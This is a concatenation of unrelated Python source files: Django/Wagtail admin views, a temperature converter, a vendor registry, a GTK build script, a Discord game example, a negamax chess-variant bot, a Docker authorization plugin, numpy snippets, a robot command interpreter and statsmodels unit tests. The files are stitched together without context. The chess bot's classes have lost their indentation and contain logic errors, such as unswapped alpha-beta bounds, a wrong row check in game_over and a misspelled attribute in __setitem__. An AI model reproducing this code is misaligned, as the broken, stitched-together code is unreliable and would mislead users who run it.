class DeleteView(generic.DeleteView):
    # Admin delete-confirmation page for a site.
    success_message = ugettext_lazy("Site '{0}' deleted.")
    page_title = ugettext_lazy("Delete site")
    confirmation_message = ugettext_lazy("Are you sure you want to delete this site?")
class SiteViewSet(ModelViewSet):
    # Wires the Site model and permission policy to the CRUD views above.
    icon = 'site'
    model = Site
    permission_policy = site_permission_policy
    index_view_class = IndexView
    add_view_class = CreateView
    edit_view_class = EditView
    delete_view_class = DeleteView
    def get_form_class(self, for_update=False):
        """Return the site form; the same form serves create and edit
        (``for_update`` is intentionally ignored)."""
        return SiteForm
|
def celsius_to_fahrenheit(celsius):
    """Convert a temperature from degrees Celsius to degrees Fahrenheit.

    Uses the exact linear relation F = (9 * C) / 5 + 32.
    """
    return ((9 * celsius) / 5) + 32


if __name__ == '__main__':
    # Read the temperature, convert it, and report both values (pt-BR prompt).
    celsius = float(input('Digite a temperatura em °C: '))
    f = celsius_to_fahrenheit(celsius)
    print('A temperatura de {}°C corresponde a {}F'.format(celsius, f))
"""
"""
import abc
from os.path import dirname
import pkgutil
import sys
__all__ = ['registry', 'Release', 'Vendor', 'VendorRegistry']
class Vendor(metaclass=abc.ABCMeta):
    """Abstract interface every vendor implementation must provide."""

    def __init__(self, config):
        # Subclasses may use ``config``; the base class keeps no state.
        pass

    @staticmethod
    @abc.abstractmethod
    def id():
        """Vendor identifier used when stored in the database."""

    @property
    @abc.abstractmethod
    def name(self):
        """Display name for the vendor."""

    @abc.abstractmethod
    def get_latest(self, device):
        """Get the latest available version for the given device."""

    def supported_devices(self):
        """Return a list of enumerated devices, if supported.

        If enumeration is not supported, return None.
        """
        # Bug fix: this was declared without ``self`` and therefore raised
        # TypeError whenever it was called on an instance.
        return None

    def retrieve_device_version(self, device):
        """Use the device information to retrieve the current version.

        If not supported, return None.
        """
        return None
class Release:
    """Value object describing a single firmware/software release."""

    # Known attributes; all default to None until supplied.
    version = None
    download_url = None
    notes = None
    docs_url = None
    hash_type = None
    hash_sum = None
    release_date = None
    file_size = None

    def __init__(self, **kwargs):
        """Accept any subset of the release fields as keyword arguments."""
        for name in kwargs:
            setattr(self, name, kwargs[name])
class VendorRegistry(object):
    """Tracks available Vendor classes and their configured instances.

    ``register`` records a class under its ``id()``.  Once ``init_config``
    has supplied a configuration, registered classes are also instantiated
    and become reachable through the mapping API (``get``/``values``/``items``).
    """

    config = None

    def __init__(self):
        self.vendor_classes = {}
        # Bug fix: ``vendors`` was only created inside init_config(), so
        # get()/values()/items()/unregister() raised AttributeError on an
        # unconfigured registry.
        self.vendors = {}
        self.vendor = None

    def init_config(self, config):
        """Store the configuration and (re)instantiate all known vendors."""
        # Bug fix: the configuration was never remembered, so register()
        # could not instantiate classes registered after init_config().
        self.config = config
        self.vendors = {}
        for vendor_id, klass in self.vendor_classes.items():
            self.vendors[vendor_id] = klass(config)

    def register(self, klass):
        """Record ``klass`` under its id; usable as a class decorator.

        If a configuration is already present, instantiate it immediately.
        """
        self.vendor_classes[klass.id()] = klass
        if self.config:
            self.vendors[klass.id()] = klass(self.config)
        return klass

    def unregister(self, name):
        """Drop the configured instance registered under ``name``, if any."""
        if name in self.vendors:
            del self.vendors[name]

    def get(self, name):
        """Return the configured vendor instance for ``name``, or None."""
        return self.vendors[name] if name in self.vendors else None

    def keys(self):
        # Keys come from the class table so they exist before init_config().
        return self.vendor_classes.keys()

    def values(self):
        return self.vendors.values()

    def items(self):
        return self.vendors.items()

    def load_vendors(self):
        """Import every vendor module so each can register itself."""
        # Load local modules living next to this package.
        basepath = dirname(__file__)
        for importer, package_name, _ in pkgutil.iter_modules([basepath]):
            full_package_name = '%s.%s' % ('vendor', package_name)
            if full_package_name not in sys.modules:
                __import__(full_package_name)
        # TODO: Test external loading of vendors
        try:
            from pkg_resources import iter_entry_points
        except ImportError:
            return
        for ep in iter_entry_points(group="homenet-check.vendor"):
            f = ep.load()
            f()
# Module-level singleton; vendor modules call ``registry.register`` on import.
registry = VendorRegistry()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import re
import os
import filecmp
def replace_if_changed(new, old):
    """Move *new* over *old* only when their contents differ.

    Leaving an unchanged *old* untouched preserves its mtime and thereby
    avoids triggering a needless rebuild.  *new* is consumed either way.
    """
    try:
        identical = filecmp.cmp(new, old, shallow=False)
    except FileNotFoundError:
        # *old* does not exist yet, so it is definitely "changed".
        identical = False
    if identical:
        os.remove(new)
    else:
        os.replace(new, old)
# Honour GTK_GENTYPEFUNCS_DEBUG to get verbose progress output.
debug = os.getenv('GTK_GENTYPEFUNCS_DEBUG') is not None
# Usage: gentypefuncs.py OUTPUT INPUT...
out_file = sys.argv[1]
in_files = sys.argv[2:]
# Collected *_get_type function names, in first-seen order (sorted later).
funcs = []
if debug: print ('Output file: ', out_file)
if debug: print (len(in_files), 'input files')
def open_file(filename, mode):
    """Open *filename*, forcing UTF-8 text on Python 3.

    Python 2's built-in ``open`` has no ``encoding`` argument, hence the
    version check.
    """
    if sys.version_info[0] >= 3:
        return open(filename, mode=mode, encoding='utf-8')
    return open(filename, mode=mode)
# Scan every input file for GObject get_type functions (gdk_/gsk_/gtk_ *_get_type).
for filename in in_files:
    if debug: print ('Input file: ', filename)
    with open_file(filename, "r") as f:
        for line in f:
            line = line.rstrip('\n').rstrip('\r')
            # print line
            match = re.search(r'\bg[dst]k_[a-zA-Z0-9_]*_get_type\b', line)
            if match:
                func = match.group(0)
                # Record each function only once.
                if not func in funcs:
                    funcs.append(func)
                    if debug: print ('Found ', func)
# Emit one "*tp++ = <func>();" line per type function, wrapping the
# backend-specific ones in the matching #ifdef guard.
file_output = ['G_GNUC_BEGIN_IGNORE_DEPRECATIONS']
funcs = sorted(funcs)
backend_guards = (
    (('gdk_x11',), 'GDK_WINDOWING_X11'),
    (('gdk_broadway', 'gsk_broadway'), 'GDK_WINDOWING_BROADWAY'),
    (('gdk_wayland',), 'GDK_WINDOWING_WAYLAND'),
    (('gdk_win32',), 'GDK_WINDOWING_WIN32'),
    (('gdk_quartz',), 'GDK_WINDOWING_MACOS'),
    (('gsk_vulkan',), 'GDK_RENDERING_VULKAN'),
)
for f in funcs:
    call = '*tp++ = {0}();'.format(f)
    guard = None
    for prefixes, macro in backend_guards:
        if f.startswith(prefixes):
            guard = macro
            break
    if guard is not None:
        file_output += ['#ifdef ' + guard, call, '#endif']
    else:
        file_output += [call]
file_output += ['G_GNUC_END_IGNORE_DEPRECATIONS']
if debug: print (len(funcs), 'functions')
# Write to a sibling temp file first; replace_if_changed keeps the output's
# mtime intact when the generated content is unchanged.
tmp_file = out_file + '~'
with open(tmp_file, 'w') as f:
    f.write('\n'.join(file_output))
replace_if_changed(tmp_file, out_file)
|
# this file shows how you could use Bot.add_cog to add games to your bot
# first, create the bot instance
from discord.ext import commands
bot = commands.Bot("!") # ! is the prefix in this case
# now import the game you need
from disgames import Hangman
# add_cog registers all of Hangman's commands on the bot at once
bot.add_cog(Hangman(bot))
# if you need 2 or more commands only, consider using the register_commands function instead
|
import sys
import random
import copy
import resource
from base_client import LiacBot
WHITE = 1
BLACK = -1
INFINITY = 100000000
# BOT =========================================================================
class KillBot(LiacBot):
    """Chess-variant bot: answers server callbacks with negamax-chosen moves."""
    name = 'KillBot'
    ip = '127.0.0.1'
    port = 50100
    # Negamax lookahead depth (overridable from the command line).
    depth = 1
    def __init__(self):
        # Constructor: just defer to the base network client.
        super(KillBot, self).__init__()
    # Callback: the server asks us for a move.
    def on_move(self, state):
        """Build a Board from ``state``, search it, and send the chosen move."""
        # Current board state.
        board = Board(state)
        # Run the negamax search.
        negamax = Negamax()
        # NOTE(review): ``color`` is a module-level global assigned in
        # __main__ — this method only works when the file runs as a script.
        moves = negamax.run(board, -INFINITY, INFINITY, self.depth, color)
        # Pick one of the equally-best moves at random.
        chosen_move = random.choice(moves['movement'])
        # Accept manual input if we ended up in a bad state.
        if state['bad_move']:
            print "bad_move"
            print state['board']
            raw_input()
        # Execute the chosen move.
        self.send_move(chosen_move[0], chosen_move[1])
        # Report the process's memory footprint (ru_maxrss units are
        # platform-dependent — KB on Linux, bytes on macOS).
        print("Used mem:")
        print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1000)
    def on_game_over(self, state):
        """Callback: the match ended; terminate the process."""
        print 'Game Over.'
        quit()
# =============================================================================
# MODELS ======================================================================
class Negamax(object):
def run(self, board, alpha, beta, act_depth, act_color):
if act_depth == 0 or board.game_over():
return { 'value': board.evaluate()*act_color, 'movement': None }
best_move = { 'value': -INFINITY, 'movement': None }
movements = board.generate()
if len(movements)==0:
return best_move
for b_movement in movements:
movement = self.run(b_movement, -alpha, -beta, act_depth-1, -act_color)
movement['value'] = -movement['value']
if best_move['value'] <= movement['value']:
if best_move['value'] < movement['value']:
best_move = {'value':movement['value'], 'movement':[]}
best_move['movement'].append((b_movement._from, b_movement._to))
alpha = max(alpha,movement['value'])
if alpha >= beta:
break
return best_move
class Board(object):
def __init__(self, state):
self.value = -1
self.cells = [[None for j in xrange(8)] for i in xrange(8)]
self.my_pieces = []
self.my_opponent_pieces = []
PIECES = {
'r': Rook,
'p': Pawn,
'n': Knight,
}
my_team = state['who_moves']
c = state['board']
i = 0
for row in xrange(7, -1, -1):
for col in xrange(0, 8):
if c[i] != '.':
cls = PIECES[c[i].lower()]
team = BLACK if c[i].lower() == c[i] else WHITE
piece = cls(self, team, (row, col))
self.cells[row][col] = piece
if team == my_team:
self.my_pieces.append(piece)
else:
self.my_opponent_pieces.append(piece)
i += 1
# Avalia a si mesmo ao criar uma instancia
self.value = self.evaluate()
def __getitem__(self, pos):
if not 0 <= pos[0] <= 7 or not 0 <= pos[1] <= 7:
return None
return self.cells[pos[0]][pos[1]]
def __setitem__(self, pos, value):
self._cells[pos[0]][pos[1]] = value
def is_empty(self, pos):
return self[pos] is None
def update_pieces(self, my_color):
self.my_pieces = []
self.my_opponent_pieces = []
for row in xrange(0, 8):
for col in xrange(0, 8):
piece = self.cells[row][col]
if piece != None:
if piece.team == my_color:
self.my_pieces.append(piece)
else:
self.my_opponent_pieces.append(piece)
def print_board(self):
for row in xrange(0, 8):
for col in xrange(0, 8):
if isinstance(self.cells[row][col], Pawn):
if self.cells[row][col].team == BLACK:
if col == 7:
print "P "
else:
print "P ",
else:
if col == 7:
print "p "
else:
print "p ",
elif isinstance(self.cells[row][col], Rook):
if self.cells[row][col].team == BLACK:
if col == 7:
print "R "
else:
print "R ",
else:
if col == 7:
print "r "
else:
print "r ",
elif isinstance(self.cells[row][col], Knight):
if self.cells[row][col].team == BLACK:
if col == 7:
print "K "
else:
print "K ",
else:
if col == 7:
print "k "
else:
print "k ",
else:
if col == 7:
print ". "
else:
print ". ",
def generate(self):
moves = []
for piece in self.my_pieces:
ms = piece.generate()
ms = [(piece.position, m) for m in ms]
moves.extend(ms)
# Gerar tabuleiros a partir de movimentos
boards = []
for move in moves:
new_board = copy.deepcopy(self)
new_board.cells[move[1][0]][move[1][1]] = new_board.cells[move[0][0]][move[0][1]]
new_board.cells[move[0][0]][move[0][1]] = None
new_board._from = (move[0][0], move[0][1])
new_board._to = (move[1][0], move[1][1])
boards.append(new_board)
return boards
# Funcao de avaliacao do tabuleiro
def evaluate(self):
white_pawns = 0
black_pawns = 0
white_rooks = 0
black_rooks = 0
white_knights = 0
black_knights = 0
board_value = 0
for i in xrange(0, 8):
for j in xrange(0, 8):
piece = self.cells[i][j]
# Verifica se existe uma peca na posicao
if piece is None:
continue
elif piece.team == BLACK:
if isinstance(piece, Pawn):
board_value = board_value - i
black_pawns += 1
if isinstance(piece, Rook):
black_rooks += 1
if isinstance(piece, Knight):
black_knights += 1
else:
if isinstance(piece, Pawn):
board_value = board_value + (7-i)
white_pawns += 1
if isinstance(piece, Rook):
white_rooks += 1
if isinstance(piece, Knight):
white_knights += 1
# Verifica se alguem venceu
if white_pawns == 0:
self.value = INFINITY
elif black_pawns == 0:
self.value = -INFINITY
# Calcula a funcao de avaliacao do tabuleiro
board_value = board_value + 10*(white_pawns - black_pawns) + 3*(white_knights - black_knights) + 5*(white_rooks - black_rooks)
self.value = board_value
return self.value
# Testa posicao de game over
def game_over(self):
# Verifica se alguem venceu
for i in xrange(8):
if isinstance(self.cells[0][i], Pawn) and self.cells[0][i].team == BLACK:
return True
elif isinstance(self.cells[7][i], Pawn) and self.cells[0][i].team == WHITE:
return True
# Verifica se ainda existem peoes
count_pawns = 0
for i in xrange(8):
for j in xrange(8):
if isinstance(self.cells[i][j], Pawn):
count_pawns += 1
if count_pawns == 0:
return True
return False
class Piece(object):
    """Common state and helpers shared by all piece types."""

    def __init__(self):
        self.board = None
        self.team = None
        self.position = None
        self.type = None

    def generate(self):
        """Return the piece's target squares (overridden by subclasses)."""
        pass

    def is_opponent(self, piece):
        """True when ``piece`` exists and belongs to the other team."""
        if piece is None:
            return False
        return piece.team != self.team
class Pawn(Piece):
    """Pawn: advances one row towards the enemy side, captures diagonally."""

    def __init__(self, board, team, position):
        self.board = board
        self.team = team
        self.position = position

    def generate(self):
        """Return the pawn's candidate target squares."""
        moves = []
        row, col = self.position
        forward = self.team  # WHITE (+1) moves up, BLACK (-1) moves down
        # Single step ahead, only onto an empty square.
        ahead = (row + forward, col)
        if self.board.is_empty(ahead):
            moves.append(ahead)
        # Diagonal captures: right first, then left, onto enemy pieces only.
        for side in (1, -1):
            target = (row + forward, col + side)
            if self.is_opponent(self.board[target]):
                moves.append(target)
        # Double first step and en passant are intentionally not implemented.
        return moves
class Rook(Piece):
    """Rook: slides along its row and column until the path is blocked."""

    def __init__(self, board, team, position):
        self.board = board
        self.team = team
        self.position = position

    def _col(self, dir_):
        """Yield squares stepping horizontally; the sign of ``dir_`` picks the side."""
        my_row, my_col = self.position
        d = -1 if dir_ < 0 else 1
        for col in xrange(1, abs(dir_)):
            yield (my_row, my_col + d*col)

    def _row(self, dir_):
        """Yield squares stepping vertically; the sign of ``dir_`` picks the side."""
        my_row, my_col = self.position
        d = -1 if dir_ < 0 else 1
        for row in xrange(1, abs(dir_)):
            yield (my_row + d*row, my_col)

    def _gen(self, moves, gen, idx):
        """Walk one ray, collecting squares until something blocks it."""
        for pos in gen(idx):
            piece = self.board[pos]
            if piece is None:
                moves.append(pos)
                continue
            elif piece.team != self.team:
                # Enemy piece: capturable, but the ray stops here.
                moves.append(pos)
                break
            else:
                # Bug fix: a friendly piece must also stop the ray; the
                # original fell through and let the rook jump over it.
                break

    def generate(self):
        """Return every square this rook can move to."""
        moves = []
        my_row, my_col = self.position
        self._gen(moves, self._col, 8-my_col) # RIGHT
        self._gen(moves, self._col, -my_col-1) # LEFT
        self._gen(moves, self._row, 8-my_row) # TOP
        self._gen(moves, self._row, -my_row-1) # BOTTOM
        return moves
class Knight(Piece):
    """Knight: jumps in the eight L-shaped offsets, ignoring blockers."""

    # Offsets in the exact order the original enumerated them.
    _OFFSETS = ((1, 2), (1, -2), (-1, 2), (-1, -2),
                (2, 1), (2, -1), (-2, 1), (-2, -1))

    def __init__(self, board, team, position):
        self.board = board
        self.team = team
        self.position = position

    def _gen(self, moves, row, col):
        """Append (row, col) when it is on the board and empty or capturable."""
        if 0 <= row <= 7 and 0 <= col <= 7:
            piece = self.board[(row, col)]
            if piece is None or self.is_opponent(piece):
                moves.append((row, col))

    def generate(self):
        """Return every square this knight can jump to."""
        moves = []
        row, col = self.position
        for d_row, d_col in self._OFFSETS:
            self._gen(moves, row + d_row, col + d_col)
        return moves
# =============================================================================
if __name__ == '__main__':
    # Defaults: play white on port 50100.
    color = 1
    port = 50100
    # First CLI argument selects the side; 'black' flips colour and port.
    if len(sys.argv) > 1:
        if sys.argv[1] == 'black':
            color = -1
            port = 50200
    bot = KillBot()
    bot.port = port
    # Optional second argument overrides the negamax search depth.
    if len(sys.argv) > 2:
        if sys.argv[2]:
            bot.depth = int(sys.argv[2])
    bot.start()
|
# vim:set ts=4 sw=4 et:
"""Leash server plugin for docker.
This module is responsible for dispatching HTTP requests.
"""
import sys
from flask import jsonify, request
from . import app
from .exceptions import (InvalidRequestException, NoSuchCheckModuleException,
UnauthorizedException)
from .processor import Processor
# Keep the plugin directory free of .pyc files.
sys.dont_write_bytecode = True
__version__ = '0.0.1.dev0'
def setup_app(application):
    """Initialize *application*: build a configured Processor and share it
    through the Flask app config."""
    processor = Processor()
    processor.load_config()
    application.config["processor"] = processor
# Configure the shared Flask application as soon as this module is imported.
setup_app(app)
@app.route('/')
def index():
    """Main entry point; responds to the `GET` method on the `/` URI."""
    # Plain-text banner, mostly useful as a liveness check.
    return "Docker Leash Plugin"
@app.route("/Plugin.Activate", methods=['POST'])
def activate():
"""Return implemented event system.
It is used internally by the Docker daemon to indicate which event system
is concerned by the plugin.
In the case of this plugin, it return `authz`.
See the `official docker documentation
<https://docs.docker.com/engine/extend/plugin_api/#pluginactivate>`__.
**Request**:
.. sourcecode:: http
GET /Plugin.Activate HTTP/1.1
Host: example.com
Accept: application/json
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Implements": ["authz"]
}
:resheader Content-Type: application/json
:status 200: valid response
:rtype: :class:`flask.Response`
"""
return jsonify({'Implements': ['authz']})
@app.route("/AuthZPlugin.AuthZReq", methods=['POST'])
def authz_request():
"""Process a request for authorization.
This is one of the main feature of this plugin.
Depending on the configuration, the system, will allow or deny a request.
For a specific user, if no configuration match the `RequestMethod` and
the `RequestUri`, then the default action is to deny the request.
.. seealso::
Function :func:`authz_response` for response authentication.
.. seealso::
See `official docker documentation
<https://docs.docker.com/engine/extend/plugins_authorization/#request-authorization>`__.
**Request**:
.. sourcecode:: http
GET /AuthZPlugin.AuthZReq HTTP/1.1
Host: example.com
Accept: application/json
{
"User": "mal",
"AuthenticationMethod": "TLS",
"RequestMethod": "POST",
"RequestUri": "/v1.32/containers/json",
"RequestHeaders": "<base64 encoded string>",
"RequestBody": "<base64 encoded string>"
}
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Allow": "true",
"Msg": "Authorization granted",
"Err": "Authorization granted"
}
:reqheader Accept: application/json
:<json string User: The user identification
:<json string AuthenticationMethod: The authentication method used
:<json enum RequestMethod: The HTTP method (GET/DELETE/POST)
:<json string RequestUri: The HTTP request URI including API version
(e.g., /v1.32/containers/json)
:<json map[string]string RequestHeaders: Request headers as key value pairs
(without the authorization header)
:<json []byte RequestBody: Raw request body
:>json bool Allow: Boolean value indicating whether the request is allowed
or denied
:>json string Msg: Authorization message
(will be returned to the client in case the access is denied)
:>json string Err: Error message.
Will be returned to the client in case the plugin
encounter an error.
The string value supplied may appear in logs,
so should not include confidential information.
:resheader Content-Type: application/json
:status 200: valid response
:status 400: malformed request
:status 422: invalid parameters
:rtype: :class:`flask.Response`
"""
try:
app.config["processor"].run(request.data)
except InvalidRequestException as error:
app.logger.error("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
except UnauthorizedException as error:
app.logger.error("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
except NoSuchCheckModuleException as error: # pragma: no cover
app.logger.critical("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
# except BaseException as error: # pragma: no cover
# app.logger.critical("REQUEST DENIED: %s", error)
# return jsonify({
# "Allow": False,
# "Msg": str(error)
# })
app.logger.info("REQUEST ALLOWED")
return jsonify({
"Allow": True,
"Msg": "The authorization succeeded."
})
@app.route("/AuthZPlugin.AuthZRes", methods=['POST'])
def authz_response():
"""Process a response for authorization.
This is one of the main feature of this plugin.
Depending on the configuration, the system, will allow or deny a request.
.. Warning::
In the current version, we don't check any parameter, and always accept the request.
In contrast to :func:`authz_response`, this endpoint is called after
the action has been processed by the docker daemon.
The request payload contains additional fields representing the response
from the daemon.
.. seealso::
Function :func:`authz_request` for request authentication.
.. seealso::
Check the `official docker documentation
<https://docs.docker.com/engine/extend/plugins_authorization/#response-authorization>`__.
**Request**:
.. sourcecode:: http
GET /AuthZPlugin.AuthZReq HTTP/1.1
Host: example.com
Accept: application/json
{
"User": "mal",
"AuthenticationMethod": "TLS",
"RequestMethod": "POST",
"RequestUri": "/v1.32/containers/json",
"RequestHeaders": "<base64 encoded string>",
"RequestBody": "<base64 encoded string>",
"ResponseStatusCode": "200",
"ResponseHeaders": "<base64 encoded string>",
"ResponseBody": "<base64 encoded string>"
}
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Allow": "true",
"Msg": "Authorization granted",
"Err": "Authorization granted"
}
:reqheader Accept: application/json
:<json string User: The user identification
:<json string AuthenticationMethod: The authentication method used
:<json enum RequestMethod: The HTTP method (GET/DELETE/POST)
:<json string RequestUri: The HTTP request URI including API version
(e.g., /v1.32/containers/json)
:<json map[string]string RequestHeaders: Request headers as key value pairs
(without the authorization header)
:<json []byte RequestBody: Raw request body
:<json int ResponseStatusCode: Status code from the docker daemon
:<json map[string]string ResponseHeaders: Response headers as key value pairs
:<json []byte ResponseBody: Raw docker daemon response body
:>json bool Allow: Boolean value indicating whether the request is allowed or denied
:>json string Msg: Authorization message
(will be returned to the client in case the access is denied)
:>json string Err: Error message.
Will be returned to the client in case the plugin encounter
an error.
The string value supplied may appear in logs,
so should not include confidential information.
:resheader Content-Type: application/json
:status 200: valid response
:status 400: malformed request
:status 422: invalid parameters
:rtype: :class:`flask.Response`
"""
response = {"Allow": True}
return jsonify(**response)
|
import numpy as np
class CuboidMesh():
    """Helpers for building 3-D rectangular (cuboid) mesh grids."""

    def __init__(self, arg):
        super(CuboidMesh, self).__init__()

    @staticmethod
    def meshgrid_3d(x_1d, y_1d, z_1d):
        """Return x, y, z coordinate arrays, each of shape (P, N, M).

        With ``x_1d`` of length M, ``y_1d`` of length N and ``z_1d`` of
        length P: x varies along the last axis, y along the middle axis and
        z along the first.  ``np.meshgrid``'s default 'xy' ordering is
        unusual, so the arguments are passed reversed with explicit 'ij'
        indexing instead.
        """
        z_3d, y_3d, x_3d = np.meshgrid(z_1d, y_1d, x_1d, indexing='ij')
        return x_3d, y_3d, z_3d
import numpy, random, math
# Draw 8 integer samples from N(0, 3), retrying until the sample standard
# deviation exceeds 3 (guarantees a reasonably spread-out profile).
v = [0]
while numpy.std(v) <= 3:
    v = [int(random.gauss(0, 3)) for i in range(8)]
# Zeros are not allowed in the profile; bump them up to 1.
for i in range(8):
    if v[i] == 0:
        v[i] = 1
# Emit (angle, value) pairs for angles -pi .. +3*pi/4 in pi/4 steps.
for i in range(8):
    print -math.pi+i*math.pi/4, v[i]
|
# code dependencies
import kb_services
import parsing
import interpretation
# network toolkit
import networkx as nx
# regular expressions
import re
# drawing
# from pyrobotics.messages import Command
def interpret_command(sentence_string):
    """Ground a natural-language command against the semantic network and
    return the planner expression generated for its last grounded command.

    NOTE(review): if ``sentence_grounder`` returns an empty list,
    ``expression`` is never bound and the final ``return`` raises
    NameError — confirm callers only pass groundable sentences.
    """
    print "lol"
    # Knowledge base: the semantic network graph.
    G = kb_services.load_semantic_network()
    # Ground the sentence into zero or more concrete command structures.
    grounded_commands = interpretation.sentence_grounder(G, sentence_string)
    print "loll"
    print "grounded command: ", grounded_commands
    # Turn each grounded command into a planner dependency expression;
    # only the last expression survives the loop and is returned.
    for each_command in grounded_commands:
        expression = interpretation.generate_dependency(G, each_command)
        print "generated expression to planner: ", expression
    print "lolll"
    # sentences = interpretation.break_sentence(sentence_string)
    # print "hi: ", sentences
    # for command in sentences[0:1]:
    #     grounded_commands = interpretation.sentence_grounder(G, command)
    #     print "grounded command: ", grounded_commands
    #
    #     for each_command in grounded_commands:
    #         expression = interpretation.generate_dependency(G, each_command)
    #         print "output expression: ", expression
    #     if commands != [False]:
    #         interpreted_sentences
    #         interpreted_sentences += 1
    #     commands[0] = re.sub(' \)', ')', commands[0])
    #     commands[0] = re.sub('_', ' ', commands[0])
    return expression
#print " test: ", interpret_command("take the orange juice from the shelf and deliver it to carmen at the dining room")
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to john in the living room")
#print " --------------------------------- "
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to me")
#print " --------------------------------- "
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to the dining room")
|
from statsmodels.compat.numpy import lstsq
from statsmodels.compat.pandas import assert_index_equal
from statsmodels.compat.platform import PLATFORM_WIN
from statsmodels.compat.python import lrange
import os
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_allclose,
assert_almost_equal,
assert_equal,
assert_raises,
)
import pandas as pd
from pandas import DataFrame, Series, date_range
import pytest
from scipy.interpolate import interp1d
from statsmodels.datasets import macrodata, modechoice, nile, randhie, sunspots
from statsmodels.tools.sm_exceptions import (
CollinearityWarning,
InfeasibleTestError,
InterpolationWarning,
MissingDataError,
)
# Remove imports when range unit root test gets an R implementation
from statsmodels.tools.validation import array_like, bool_like
from statsmodels.tsa.arima_process import arma_acovf
from statsmodels.tsa.statespace.sarimax import SARIMAX
from statsmodels.tsa.stattools import (
acf,
acovf,
adfuller,
arma_order_select_ic,
breakvar_heteroskedasticity_test,
ccovf,
coint,
grangercausalitytests,
innovations_algo,
innovations_filter,
kpss,
levinson_durbin,
levinson_durbin_pacf,
pacf,
pacf_burg,
pacf_ols,
pacf_yw,
range_unit_root_test,
zivot_andrews,
)
# Precision levels (decimal places) passed to assert_almost_equal below.
DECIMAL_8 = 8
DECIMAL_6 = 6
DECIMAL_5 = 5
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
# Directory of this test file; used to locate the results CSV fixtures.
CURR_DIR = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope="module")
def acovf_data():
rnd = np.random.RandomState(12345)
return rnd.randn(250)
class CheckADF(object):
    """
    Test Augmented Dickey-Fuller

    Test values taken from Stata.

    Subclasses set ``res1`` (the adfuller output tuple) plus the expected
    ``teststat``, ``pvalue`` and ``critvalues`` in ``setup_class``.
    """
    levels = ["1%", "5%", "10%"]
    # Shared series: real GDP (has a unit root) and inflation (stationary).
    data = macrodata.load_pandas()
    x = data.data["realgdp"].values
    y = data.data["infl"].values
    def test_teststat(self):
        assert_almost_equal(self.res1[0], self.teststat, DECIMAL_5)
    def test_pvalue(self):
        assert_almost_equal(self.res1[1], self.pvalue, DECIMAL_5)
    def test_critvalues(self):
        # adfuller returns critical values as a dict keyed by level.
        critvalues = [self.res1[4][lev] for lev in self.levels]
        assert_almost_equal(critvalues, self.critvalues, DECIMAL_2)
class TestADFConstant(CheckADF):
    """
    Dickey-Fuller test for unit root
    """
    @classmethod
    def setup_class(cls):
        # Constant-only regression on real GDP; expected values from Stata.
        cls.res1 = adfuller(cls.x, regression="c", autolag=None, maxlag=4)
        cls.teststat = 0.97505319
        cls.pvalue = 0.99399563
        cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend(CheckADF):
    """ADF on real GDP with constant and linear trend (regression="ct")."""
    @classmethod
    def setup_class(cls):
        cls.res1 = adfuller(cls.x, regression="ct", autolag=None, maxlag=4)
        cls.teststat = -1.8566374
        cls.pvalue = 0.67682968
        cls.critvalues = [-4.007, -3.437, -3.137]
# FIXME: do not leave commented-out
# class TestADFConstantTrendSquared(CheckADF):
# """
# """
# pass
# TODO: get test values from R?
class TestADFNoConstant(CheckADF):
    """ADF on real GDP with no deterministic terms (regression="n")."""
    @classmethod
    def setup_class(cls):
        # The legacy alias "nc" must emit a FutureWarning.
        with pytest.warns(FutureWarning):
            adfuller(cls.x, regression="nc", autolag=None, maxlag=4)
        cls.res1 = adfuller(cls.x, regression="n", autolag=None, maxlag=4)
        cls.teststat = 3.5227498
        cls.pvalue = 0.99999
        # Stata does not return a p-value for noconstant.
        # Tau^max in MacKinnon (1994) is missing, so it is
        # assumed that its right-tail is well-behaved
        cls.critvalues = [-2.587, -1.950, -1.617]
# No Unit Root
class TestADFConstant2(CheckADF):
    """ADF with constant on the stationary inflation series (no unit root)."""
    @classmethod
    def setup_class(cls):
        cls.res1 = adfuller(cls.y, regression="c", autolag=None, maxlag=1)
        cls.teststat = -4.3346988
        cls.pvalue = 0.00038661
        cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend2(CheckADF):
    """ADF with constant and trend on the stationary inflation series."""
    @classmethod
    def setup_class(cls):
        cls.res1 = adfuller(cls.y, regression="ct", autolag=None, maxlag=1)
        cls.teststat = -4.425093
        cls.pvalue = 0.00199633
        cls.critvalues = [-4.006, -3.437, -3.137]
class TestADFNoConstant2(CheckADF):
    """ADF with no deterministic terms on the stationary inflation series."""
    @classmethod
    def setup_class(cls):
        cls.res1 = adfuller(cls.y, regression="n", autolag=None, maxlag=1)
        cls.teststat = -2.4511596
        cls.pvalue = 0.013747
        # Stata does not return a p-value for noconstant
        # this value is just taken from our results
        cls.critvalues = [-2.587, -1.950, -1.617]
        # Re-run with store=True to also capture the result-store object.
        _, _1, _2, cls.store = adfuller(
            cls.y, regression="n", autolag=None, maxlag=1, store=True
        )
    def test_store_str(self):
        assert_equal(
            self.store.__str__(), "Augmented Dickey-Fuller Test Results"
        )
class CheckCorrGram(object):
    """
    Set up for ACF, PACF tests.

    Loads real GDP and the expected correlogram values shipped as CSV.
    """
    data = macrodata.load_pandas()
    x = data.data["realgdp"]
    filename = os.path.join(CURR_DIR, "results", "results_corrgram.csv")
    results = pd.read_csv(filename, delimiter=",")
class TestACF(CheckCorrGram):
    """
    Test Autocorrelation Function
    """
    @classmethod
    def setup_class(cls):
        cls.acf = cls.results["acvar"]
        # cls.acf = np.concatenate(([1.], cls.acf))
        cls.qstat = cls.results["Q1"]
